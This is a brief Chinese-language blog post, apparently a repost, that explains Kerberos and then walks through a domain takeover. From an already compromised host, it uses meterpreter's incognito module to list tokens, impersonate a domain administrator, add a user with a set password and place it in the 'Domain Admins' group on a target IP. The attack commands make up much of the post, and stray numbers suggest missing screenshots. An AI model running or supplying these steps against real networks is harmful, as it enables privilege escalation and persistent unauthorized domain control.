WINDOWS假冒KERBEROS令牌入侵域

erberos是一种计算机网络认证协议,它允许某实体在非安全网络环境下通信,向另一个实体以一种安全的方式证明自己的身份。它也指由麻省理工实现此协议,并发布的一套免费软件。它的设计主要针对客户-服务器模型,并提供了一系列交互认证――用户和服务器都能验证对方的身份。

当成功的入侵了一个系统并建立了一个meterpreter的终端,域管理员登陆这台机器的时候会发送Kerberos令牌到服务器上。我们可以使用这个活动令牌来入侵系统,通过meterpreter可以假冒成域管理员的角色,而不需要破解它的密码然后可以去攻击域管理员账号甚至域控制器。

在meterpreter的终端下加载incognito模块list_tokens -u列举出令牌,看到1230TT\\Administrator域管理员账号我们可以假冒它

1

假冒Administrator域管理员账号

impersonate_token 1230TT\\Administrator

3

添加用户add_user 11 p@55w0rd! -h 192.168.1.150
把用户添加到域管理员组add_group_user “Domain Admins” 11 -h 192.168.1.150

2

这样很简单就可以添加了一个域管理员用户了

原文链接:http://1230tt.com/archives/250.html

你可能感兴趣的:(服务器,计算机网络,免费软件,麻省理工,入侵系统)